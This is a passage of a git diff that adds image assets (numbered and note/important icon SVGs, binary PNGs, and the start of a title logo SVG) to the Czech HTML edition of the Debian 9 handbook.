0.07747,-0.265622 0.116204,-0.581051 0.116211,-0.946289 -7e-6,-0.592118 -0.124518,-1.056961 -0.373535,-1.394531 -0.243496,-0.343094 -0.617031,-0.514643 -1.120606,-0.514649 -0.254562,6e-6 -0.486984,0.04981 -0.697266,0.149414 -0.21029,0.09962 -0.39014,0.229661 -0.53955,0.390137 -0.149418,0.160487 -0.265629,0.340337 -0.348633,0.539551 -0.07748,0.199223 -0.116214,0.401209 -0.116211,0.605957 -3e-6,0.28223 0.0332,0.564456 0.09961,0.846679 0.07194,0.276696 0.17708,0.528486 0.31543,0.755371 0.143876,0.221357 0.318193,0.401207 0.522949,0.539551 0.210282,0.138349 0.453772,0.207522 0.730469,0.20752"
+       id="path2846"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/7.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/7.png
new file mode 100644
index 000000000..9b1f20a98
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/7.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/7.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/7.svg
new file mode 100644
index 000000000..871e0eff7
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/7.svg
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:start;text-anchor:start;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 12.789991,22.008438 4.316407,-9.960937 -5.578125,0 0,-2.1582035 8.367187,0 0,1.6103515 -4.424316,10.508789 -2.681153,0"
+       id="path2832"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/8.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/8.png
new file mode 100644
index 000000000..ac38ae5bf
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/8.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/8.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/8.svg
new file mode 100644
index 000000000..10e612f6e
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/8.svg
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:start;text-anchor:start;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.761671,9.7149811 c 0.503576,1.23e-5 0.979487,0.060885 1.427734,0.1826172 0.448236,0.1217567 0.841139,0.3043737 1.178711,0.5478517 0.337558,0.243501 0.60595,0.547862 0.805176,0.913086 0.199211,0.365244 0.29882,0.794118 0.298828,1.286621 -8e-6,0.365243 -0.05535,0.697274 -0.166015,0.996094 -0.110686,0.293302 -0.262866,0.561694 -0.456543,0.805175 -0.193693,0.237963 -0.423348,0.451017 -0.688965,0.639161 -0.265632,0.188157 -0.553392,0.359707 -0.863281,0.514648 0.320957,0.171556 0.633619,0.362473 0.937988,0.572754 0.309888,0.210292 0.583814,0.448247 0.821777,0.713867 0.237948,0.260096 0.428866,0.55339 0.572754,0.879883 0.143872,0.326501 0.215812,0.691735 0.21582,1.095703 -8e-6,0.503583 -0.09962,0.960126 -0.298828,1.369629 -0.199227,0.409506 -0.478686,0.758139 -0.838379,1.045898 -0.359707,0.287761 -0.791348,0.509115 -1.294921,0.664063 -0.498053,0.154948 -1.048671,0.232422 -1.651856,0.232422 -0.652999,0 -1.234053,-0.07471 -1.743164,-0.224121 -0.509117,-0.149414 -0.93799,-0.362467 -1.286621,-0.639161 -0.348634,-0.276691 -0.614259,-0.617023 -0.796875,-1.020996 -0.177084,-0.403969 -0.265626,-0.857744 -0.265625,-1.361328 -10e-7,-0.415035 0.06087,-0.78857 0.182617,-1.120605 0.121744,-0.332027 0.287759,-0.630855 0.498047,-0.896485 0.210285,-0.265619 0.456541,-0.500808 0.73877,-0.705566 0.282224,-0.204747 0.583819,-0.384597 0.904785,-0.539551 -0.271162,-0.171543 -0.525719,-0.356927 -0.763672,-0.556152 -0.237958,-0.204746 -0.445477,-0.428866 -0.622559,-0.672363 -0.171551,-0.249016 -0.309897,-0.522942 -0.415039,-0.821778 -0.09961,-0.298819 -0.149415,-0.628083 -0.149414,-0.987793 -10e-7,-0.481435 0.09961,-0.902008 0.298828,-1.261718 0.204751,-0.365224 0.478677,-0.669585 0.821778,-0.913086 0.343096,-0.249012 0.738766,-0.434396 1.187011,-0.5561527 0.448239,-0.1217326 0.918616,-0.1826049 1.411133,-0.1826172 m -1.718262,9.0644529 c -3e-6,0.221357 0.03597,0.42611 0.107911,0.614258 0.07194,0.18262 0.17708,0.340334 0.315429,0.473145 0.143877,0.132814 0.32096,0.237957 0.53125,0.315429 0.210283,0.07194 0.453772,0.107912 0.730469,0.10791 0.581049,2e-6 1.015457,-0.135577 1.303223,-0.406738 0.287754,-0.27669 0.431634,-0.639157 0.43164,-1.087402 -6e-6,-0.232419 -0.04981,-0.439938 -0.149414,-0.622559 -0.09408,-0.188147 -0.218593,-0.359696 -0.373535,-0.514648 -0.14942,-0.160478 -0.320969,-0.307125 -0.514648,-0.439942 -0.19369,-0.132807 -0.387375,-0.260086 -0.581055,-0.381836 L 15.662062,16.72084 c -0.243494,0.12175 -0.464848,0.254563 -0.664063,0.398438 -0.199222,0.138351 -0.370772,0.293299 -0.514648,0.464844 -0.13835,0.16602 -0.24626,0.348637 -0.323731,0.547851 -0.07748,0.199223 -0.116214,0.415043 -0.116211,0.647461 m 1.701661,-7.188476 c -0.182622,10e-6 -0.354171,0.02768 -0.514649,0.08301 -0.154952,0.05535 -0.290531,0.13559 -0.406738,0.240723 -0.110681,0.105153 -0.199223,0.235199 -0.265625,0.390137 -0.06641,0.154957 -0.09961,0.329274 -0.09961,0.522949 -3e-6,0.232431 0.0332,0.434416 0.09961,0.605957 0.07194,0.166024 0.166012,0.315438 0.282226,0.448242 0.121741,0.127287 0.260087,0.243498 0.415039,0.348633 0.160478,0.09962 0.32926,0.199226 0.506348,0.298828 0.171545,-0.08853 0.334793,-0.185376 0.489746,-0.290527 0.154943,-0.105135 0.290522,-0.224113 0.406738,-0.356934 0.12174,-0.138338 0.218582,-0.293286 0.290528,-0.464843 0.07193,-0.171541 0.107904,-0.367993 0.10791,-0.589356 -6e-6,-0.193675 -0.03321,-0.367992 -0.09961,-0.522949 -0.06641,-0.154938 -0.157721,-0.284984 -0.273926,-0.390137 -0.116217,-0.105133 -0.254563,-0.185374 -0.415039,-0.240723 -0.160487,-0.05533 -0.334803,-0.083 -0.522949,-0.08301"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/9.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/9.png
new file mode 100644
index 000000000..a2972dbc2
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/9.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/9.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/9.svg
new file mode 100644
index 000000000..c488b6e4f
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/9.svg
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:start;text-anchor:start;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 19.829054,15.052383 c -9e-6,0.581061 -0.03321,1.162116 -0.09961,1.743164 -0.06088,0.575526 -0.174325,1.126144 -0.340333,1.651856 -0.160489,0.525719 -0.381843,1.018232 -0.664062,1.477539 -0.2767,0.453778 -0.630866,0.846681 -1.0625,1.178711 -0.426113,0.332032 -0.940761,0.59489 -1.543945,0.788574 -0.597661,0.188151 -1.30046,0.282227 -2.108399,0.282227 -0.116214,0 -0.243492,-0.0028 -0.381836,-0.0083 -0.138348,-0.0055 -0.279462,-0.01384 -0.42334,-0.0249 -0.138348,-0.0055 -0.273927,-0.0166 -0.406738,-0.0332 -0.132814,-0.01107 -0.249025,-0.02767 -0.348633,-0.0498 l 0,-2.058594 c 0.204751,0.05534 0.423338,0.09961 0.655762,0.132813 0.237954,0.02767 0.478676,0.04151 0.722168,0.0415 0.747067,2e-6 1.361324,-0.09131 1.842773,-0.273925 0.481441,-0.188149 0.863276,-0.44824 1.145508,-0.780274 0.282221,-0.337562 0.481439,-0.738766 0.597657,-1.203613 0.121738,-0.464839 0.196445,-0.97672 0.224121,-1.535645 l -0.107911,0 c -0.110683,0.199225 -0.243495,0.384609 -0.398437,0.556153 -0.154954,0.171554 -0.337571,0.320968 -0.547852,0.448242 -0.210291,0.127283 -0.448247,0.226892 -0.713867,0.298828 -0.265629,0.07194 -0.56169,0.107914 -0.888183,0.10791 -0.52572,4e-6 -0.998864,-0.08577 -1.419434,-0.257324 -0.420575,-0.171545 -0.777508,-0.420568 -1.070801,-0.74707 -0.287761,-0.326492 -0.509115,-0.727696 -0.664062,-1.203614 -0.154949,-0.475904 -0.232423,-1.020988 -0.232422,-1.635253 -10e-7,-0.65852 0.09131,-1.247875 0.273926,-1.768067 0.18815,-0.520172 0.453774,-0.960113 0.796875,-1.319824 0.343097,-0.365223 0.758135,-0.644682 1.245117,-0.838379 0.49251,-0.1936727 1.043127,-0.2905151 1.651855,-0.2905274 0.597651,1.23e-5 1.15657,0.1079224 1.676758,0.3237304 0.520176,0.210298 0.971184,0.534028 1.353027,0.971192 0.381829,0.437185 0.683423,0.990569 0.904786,1.660156 0.221345,0.669605 0.332022,1.458178 0.332031,2.365722 m -4.216797,-3.262207 c -0.226892,1.1e-5 -0.434412,0.04151 -0.622559,0.124512 -0.188154,0.08302 -0.351403,0.213063 -0.489746,0.390137 -0.132815,0.171559 -0.237959,0.392913 -0.315429,0.664062 -0.07194,0.265634 -0.107914,0.581063 -0.107911,0.946289 -3e-6,0.586596 0.124509,1.05144 0.373536,1.394532 0.249019,0.343105 0.625321,0.514654 1.128906,0.514648 0.254552,6e-6 0.486974,-0.0498 0.697266,-0.149414 0.210281,-0.0996 0.390131,-0.229648 0.53955,-0.390137 0.149408,-0.160475 0.262852,-0.340325 0.340332,-0.53955 0.083,-0.199212 0.124506,-0.401197 0.124512,-0.605958 -6e-6,-0.282218 -0.03598,-0.561677 -0.10791,-0.838378 -0.06641,-0.282218 -0.171556,-0.534008 -0.31543,-0.755372 -0.138352,-0.226878 -0.312668,-0.409495 -0.522949,-0.547851 -0.204758,-0.138336 -0.44548,-0.207509 -0.722168,-0.20752"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/dot.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/dot.png
new file mode 100644
index 000000000..077ecd4b5
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/dot.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/dot2.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/dot2.png
new file mode 100644
index 000000000..8348fcd05
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/dot2.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/green.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/green.png
new file mode 100644
index 000000000..ebb3c247d
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/green.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/h1-bg.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/h1-bg.png
new file mode 100644
index 000000000..d67e9b9e8
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/h1-bg.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/image_left.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/image_left.png
new file mode 100644
index 000000000..4f742e0e1
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/image_left.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/image_right.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/image_right.png
new file mode 100644
index 000000000..63d7ac214
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/image_right.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/important.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/important.png
new file mode 100644
index 000000000..969562b7b
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/important.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/important.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/important.svg
new file mode 100644
index 000000000..064c783b5
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/important.svg
@@ -0,0 +1,30 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="48"
+   height="48"
+   id="svg2">
+  <defs
+     id="defs5" />
+  <path
+     d="M 255.25,-411.29002 L 261.86798,-400.85887 L 273.83367,-397.7882 L 265.95811,-388.27072 L 266.73534,-375.94179 L 255.25,-380.49082 L 243.76466,-375.94179 L 244.54189,-388.27072 L 236.66633,-397.7882 L 248.63202,-400.85887 L 255.25,-411.29002 z "
+     transform="matrix(1.1071323,0,0,1.1071323,-258.4137,459.98052)"
+     style="fill:#2e3436;fill-opacity:1;stroke:#2e3436;stroke-width:4.25880718;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1"
+     id="path4450" />
+  <path
+     d="M 255.25,-411.29002 L 261.86798,-400.85887 L 273.83367,-397.7882 L 265.95811,-388.27072 L 266.73534,-375.94179 L 255.25,-380.49082 L 243.76466,-375.94179 L 244.54189,-388.27072 L 236.66633,-397.7882 L 248.63202,-400.85887 L 255.25,-411.29002 z "
+     transform="matrix(1.1071323,0,0,1.1071323,-258.4137,459.98052)"
+     style="fill:#fac521;fill-opacity:1;stroke-width:3.4070456;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1"
+     id="path4452" />
+  <path
+     d="M 24.175987,4.476098 L 16.980534,16.087712 L 3.9317841,19.443104 L 16.980534,20.076901 L 24.175987,10.383543 L 31.408721,20.076901 L 44.457471,19.443104 L 31.468862,16.027571 L 24.175987,4.476098 z "
+     style="fill:#feeaab;fill-opacity:1;stroke-width:3.4070456;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1"
+     id="path4531" />
+  <path
+     d="M 12.456856,24.055852 C 11.65845,24.299685 14.436112,29.177769 14.436112,32.041127 C 14.436112,37.343117 13.010825,39.831516 15.971742,37.364645 C 18.711008,35.08244 21.184735,34.873512 24.195894,34.873512 C 27.207053,34.873512 29.646656,35.08244 32.38592,37.364645 C 35.346837,39.831516 33.921551,37.343117 33.92155,32.041127 C 33.92155,28.223316 38.868232,20.827013 33.682674,25.591482 C 31.458295,27.635233 27.413886,29.481744 24.195894,29.481744 C 20.977903,29.481744 16.933493,27.635233 14.709113,25.591482 C 13.412724,24.400365 12.722992,23.974574 12.456856,24.055852 z "
+     style="fill:#fcd867;fill-opacity:1;stroke-width:3.4070456;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1"
+     id="path2185" />
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/note.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/note.png
new file mode 100644
index 000000000..d04775d99
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/note.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/note.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/note.svg
new file mode 100644
index 000000000..abe5a6024
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/note.svg
@@ -0,0 +1,28 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="48"
+   height="48"
+   id="svg2">
+  <defs
+     id="defs5" />
+  <path
+     d="M 30.27396,4.1232594 L 18.765811,4.1232594 C 11.476786,4.1232594 5.5574109,10.546411 5.5574109,19.960741 C 5.5574109,24.746615 7.0844878,29.075948 9.5403943,32.177328 C 9.4616811,32.681104 9.414455,33.200619 9.414455,33.720144 C 9.414455,39.308917 13.554865,43.591015 18.891751,44.267966 C 17.506371,42.693663 16.656245,40.914707 16.656245,38.616218 C 16.656245,38.01799 16.719219,37.419752 16.82942,36.837262 C 17.459135,36.963202 18.104599,37.026176 18.750063,37.026176 L 30.258211,37.026176 C 37.547237,37.026176 43.466612,29.39081 43.466612,19.960741 C 43.466612,10.530672 37.578724,4.1232594 30.27396,4.1232594 z "
+     style="fill:#2e3436;fill-opacity:1;stroke:#2e3436;stroke-width:4.7150631;stroke-miterlimit:4;stroke-dasharray:none"
+     id="path4317" />
+  <path
+     d="M 30.27396,4.1232594 L 18.765811,4.1232594 C 11.476786,4.1232594 5.5574109,10.546411 5.5574109,19.960741 C 5.5574109,24.746615 7.0844878,29.075948 9.5403943,32.177328 C 9.4616811,32.681104 9.414455,33.200619 9.414455,33.720144 C 9.414455,39.308917 13.554865,43.591015 18.891751,44.267966 C 17.506371,42.693663 16.656245,40.914707 16.656245,38.616218 C 16.656245,38.01799 16.719219,37.419752 16.82942,36.837262 C 17.459135,36.963202 18.104599,37.026176 18.750063,37.026176 L 30.258211,37.026176 C 37.547237,37.026176 43.466612,29.39081 43.466612,19.960741 C 43.466612,10.530672 37.578724,4.1232594 30.27396,4.1232594 z "
+     style="fill:#bfdce8;fill-opacity:1"
+     id="path142" />
+  <path
+     d="M 19.200879,5.5648899 C 12.490241,5.5648899 7.0622987,11.295775 7.0622987,19.690323 C 7.0622987,22.890926 7.8418023,25.879852 9.1910836,28.332288 C 8.6113289,26.599889 8.2852163,24.667826 8.2852163,22.673336 C 8.2852163,14.629768 13.495502,9.1620492 19.925575,9.1620492 L 30.071259,9.1620492 C 36.515213,9.1620492 41.711609,14.616311 41.711609,22.673336 C 41.864688,21.709218 41.983366,20.710908 41.983366,19.690323 C 41.983366,11.281743 36.524624,5.5648899 29.799492,5.5648899 L 19.200879,5.5648899 z "
+     style="fill:#ffffff"
+     id="path2358" />
+  <path
+     d="M 28.241965,33.725087 L 20.792252,33.725087 C 16.073756,33.725087 12.241894,32.944782 12.241894,26.850486 C 12.241894,25.10387 12.368512,23.572125 15.515722,23.567487 L 33.508301,23.540969 C 36.182481,23.537028 36.782127,24.950794 36.782127,26.850486 C 36.782127,32.95497 32.970649,33.725087 28.241965,33.725087 z "
+     style="fill:#d0ecf9;fill-opacity:1"
+     id="path2173" />
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/red.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/red.png
new file mode 100644
index 000000000..d32d5e2e8
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/red.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/shine.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/shine.png
new file mode 100644
index 000000000..7d736bdef
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/shine.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/stock-go-back.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/stock-go-back.png
new file mode 100644
index 000000000..0f26df330
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/stock-go-back.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/stock-go-forward.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/stock-go-forward.png
new file mode 100644
index 000000000..4bcbf0296
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/stock-go-forward.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/stock-go-up.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/stock-go-up.png
new file mode 100644
index 000000000..8bcf9e725
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/stock-go-up.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/stock-home.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/stock-home.png
new file mode 100644
index 000000000..f37ef3d1b
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/stock-home.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/title_logo.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/title_logo.png
new file mode 100644
index 000000000..75fd5035c
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/title_logo.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/title_logo.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/title_logo.svg
new file mode 100644
index 000000000..05cc1c4cd
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/title_logo.svg
@@ -0,0 +1,350 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:dc="http://purl.org/dc/elements/1.1/"
+   xmlns:cc="http://creativecommons.org/ns#"
+   xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   xmlns:xlink="http://www.w3.org/1999/xlink"
+   xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd"
+   xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape"
+   version="1.1"
+   width="253.10916"
+   height="195.16167"
+   id="svg2"
+   style="enable-background:new">
+  <defs
+     id="defs5">
+    <linearGradient
+       id="linearGradient6430">
+      <stop
+         id="stop6432"
+         style="stop-color:#ce0000;stop-opacity:1"
+         offset="0" />
+      <stop
+         id="stop6434"
+         style="stop-color:#e90000;stop-opacity:1"
+         offset="1" />
+    </linearGradient>
+    <linearGradient
+       id="linearGradient3218">
+      <stop
+         id="stop3220"
+         style="stop-color:#000000;stop-opacity:1"
+         offset="0" />
+      <stop
+         id="stop3222"
+         style="stop-color:#555753;stop-opacity:1"
+         offset="1" />
+    </linearGradient>
+    <linearGradient
+       id="linearGradient3210">
+      <stop
+         id="stop3212"
+         style="stop-color:#edd400;stop-opacity:1"
+         offset="0" />
+      <stop
+         id="stop3214"
+         style="stop-color:#fce94f;stop-opacity:1"
+         offset="1" />
+    </linearGradient>
+    <linearGradient
+       id="linearGradient3558">
+      <stop
+         id="stop3560"
+         style="stop-color:#4bc6ff;stop-opacity:1"
+         offset="0" />
+      <stop
+         id="stop3562"
+         style="stop-color:#1fb7ff;stop-opacity:0"
+         offset="1" />
+    </linearGradient>
+    <linearGradient
+       id="linearGradient2652">
+      <stop
+         id="stop2654"
+         style="stop-color:#ef5d29;stop-opacity:1"
+         offset="0" />
+      <stop
+         id="stop2656"
+         style="stop-color:#ef2929;stop-opacity:0"
+         offset="1" />
+    </linearGradient>
+    <linearGradient
+       id="linearGradient3770">
+      <stop
+         id="stop3772"
+         style="stop-color:#999999;stop-opacity:0"
+         offset="0" />
+      <stop
+         id="stop3774"
+         style="stop-color:#cccccc;stop-opacity:1"
+         offset="0.28968501" />
+      <stop
+         id="stop3776"
+         style="stop-color:#cccccc;stop-opacity:1"
+         offset="0.72421253" />
+      <stop
+         id="stop3778"
+         style="stop-color:#999999;stop-opacity:0"
+         offset="1" />
+    </linearGradient>
+    <linearGradient
+       id="linearGradient3578">
+      <stop
+         id="stop3580"
+         style="stop-color:#999999;stop-opacity:1"
+         offset="0" />
+      <stop
+         id="stop3582"
+         style="stop-color:#ffffff;stop-opacity:1"
+         offset="1" />
+    </linearGradient>
+    <linearGradient
+       x1="292.98209"
+       y1="248.94519"
+       x2="292.71686"
+       y2="254.84595"
+       id="linearGradient3605"
+       xlink:href="#linearGradient3578"
+       gradientUnits="userSpaceOnUse" />
+    <linearGradient
+       x1="579.61249"
+       y1="-2053.46"
+       x2="633.25787"
+       y2="-2073.55"
+       id="linearGradient3607"
+       xlink:href="#linearGradient3770"
+       gradientUnits="userSpaceOnUse"
+       gradientTransform="matrix(0.8697037,0.5377184,-0.05088559,2.0041935,-132.86485,4079.057)" />
+    <linearGradient
+       x1="579.61249"
+       y1="-2053.46"
+       x2="633.25787"
+       y2="-2073.55"
+       id="linearGradient3609"
+       xlink:href="#linearGradient3770"
+       gradientUnits="userSpaceOnUse"
+       gradientTransform="matrix(0.8697037,0.5377184,-0.05088559,2.0041935,-132.86485,4082.0622)" />
+    <linearGradient
+       x1="579.61249"
+       y1="-2053.46"
+       x2="633.25787"
+       y2="-2073.55"
+       id="linearGradient3611"
+       xlink:href="#linearGradient3770"
+       gradientUnits="userSpaceOnUse"
+       gradientTransform="matrix(0.8697037,0.5377184,-0.05088559,2.0041935,-132.86485,4085.0674)" />
+    <linearGradient
+       x1="579.61249"
+       y1="-2053.46"
+       x2="633.25787"
+       y2="-2073.55"
+       id="linearGradient3613"
+       xlink:href="#linearGradient3770"
+       gradientUnits="userSpaceOnUse"
+       gradientTransform="matrix(0.8697037,0.5377184,-0.05088559,2.0041935,-132.86485,4088.0726)" />
+    <radialGradient
+       cx="308.00009"
+       cy="237.60178"
+       r="13.826746"
+       fx="308.00009"
+       fy="237.60178"
+       id="radialGradient3615"
+       xlink:href="#linearGradient2652"
+       gradientUnits="userSpaceOnUse"
+       gradientTransform="matrix(-2.470026,1.2123383,-2.5289897,-1.8798194,1652.7116,307.88628)" />
+    <radialGradient
+       cx="313.97348"
+       cy="257.40872"
+       r="4.0046649"
+       fx="313.97348"
+       fy="257.40872"
+       id="radialGradient3617"
+       xlink:href="#linearGradient3558"
+       gradientUnits="userSpaceOnUse"
+       gradientTransform="matrix(-1.2239386,0.8005673,-1.1669368,-1.1126277,983.68752,289.08822)" />
+    <linearGradient
+       x1="121.62237"
+       y1="166.88406"
+       x2="121.62236"
+       y2="63.590191"
+       id="linearGradient3216"
+       xlink:href="#linearGradient3210"
+       gradientUnits="userSpaceOnUse"
+       gradientTransform="matrix(0.9919329,0,0,0.9919329,-57.187787,-52.294514)" />
+    <linearGradient
+       x1="282.13562"
+       y1="198.85522"
+       x2="282.13562"
+       y2="220.4299"
+       id="linearGradient3224"
+       xlink:href="#linearGradient3218"
+       gradientUnits="userSpaceOnUse"
